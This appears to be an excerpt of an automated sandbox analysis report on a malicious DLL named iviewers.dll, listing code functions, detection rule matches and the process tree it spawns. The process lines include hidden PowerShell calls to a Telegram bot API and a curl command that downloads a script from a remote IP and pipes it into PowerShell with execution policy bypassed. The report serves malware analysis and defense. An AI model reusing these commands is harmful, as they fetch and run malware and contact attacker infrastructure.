            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004281CC45_2_004281CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004409E045_2_004409E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042C9EB45_2_0042C9EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042E18045_2_0042E180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043F18B45_2_0043F18B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004291AE45_2_004291AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004239B945_2_004239B9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043CA4045_2_0043CA40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00435A4F45_2_00435A4F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043DA4D45_2_0043DA4D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040427045_2_00404270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041E22045_2_0041E220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FA2045_2_0043FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041122745_2_00411227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00419AD045_2_00419AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004242D045_2_004242D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043928045_2_00439280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00439A8045_2_00439A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00428ABC45_2_00428ABC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040AB4045_2_0040AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042134045_2_00421340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042D34A45_2_0042D34A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042F37745_2_0042F377
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040931045_2_00409310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FB1045_2_0043FB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FB2A45_2_0043FB2A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FB2845_2_0043FB28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040F3C045_2_0040F3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004073D045_2_004073D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004283D845_2_004283D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041EB8045_2_0041EB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00404BA045_2_00404BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042744045_2_00427440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043A44045_2_0043A440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0044046045_2_00440460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041747D45_2_0041747D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00433C1045_2_00433C10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004204C645_2_004204C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004224E045_2_004224E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040D4F345_2_0040D4F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00431CF045_2_00431CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00414CA045_2_00414CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042CD4C45_2_0042CD4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042CD5E45_2_0042CD5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042456045_2_00424560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FD7045_2_0043FD70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00421D0045_2_00421D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00440D2045_2_00440D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00411D2B45_2_00411D2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00426D2E45_2_00426D2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00439D3045_2_00439D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042C53C45_2_0042C53C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043A5D445_2_0043A5D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004065F045_2_004065F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043CDF045_2_0043CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043C5A045_2_0043C5A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00437DA945_2_00437DA9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043865045_2_00438650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042EE6345_2_0042EE63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00420E6C45_2_00420E6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00422E6D45_2_00422E6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042FE7445_2_0042FE74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043FE0045_2_0043FE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040F60D45_2_0040F60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041961B45_2_0041961B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041E63045_2_0041E630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004246D045_2_004246D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004406F045_2_004406F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040E68745_2_0040E687
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00438EA045_2_00438EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00402EB045_2_00402EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041AEB045_2_0041AEB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042774045_2_00427740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041275045_2_00412750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041DF5045_2_0041DF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00416F5245_2_00416F52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00425F1B45_2_00425F1B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0042973945_2_00429739
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004157C045_2_004157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0040978045_2_00409780
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F952730 appears 35 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414C90 appears 77 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00407F60 appears 40 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6F952730 appears 35 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F952730 appears 35 times
            Source: iviewers.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 24.2.powershell.exe.4d8584c.1.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 24.2.powershell.exe.4d73b34.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 27.2.powershell.exe.56d5e3c.3.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 27.2.powershell.exe.56c4124.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.8b20000.4.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.58027a8.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.58144c0.2.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 37.2.powershell.exe.57072b8.1.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 37.2.powershell.exe.5718fd0.2.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 27.2.powershell.exe.574883c.1.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 29.2.powershell.exe.5886eb4.3.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 29.2.powershell.exe.8b30000.5.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: xyq5akbp.dll.32.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 1yj35v5c.dll.33.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: wzlesmvi.dll.34.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDLL@90/42@2/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00432070 CoCreateInstance,45_2_00432070
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5ultme0.dys.ps1Jump to behavior
            Source: iviewers.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: iviewers.dllReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
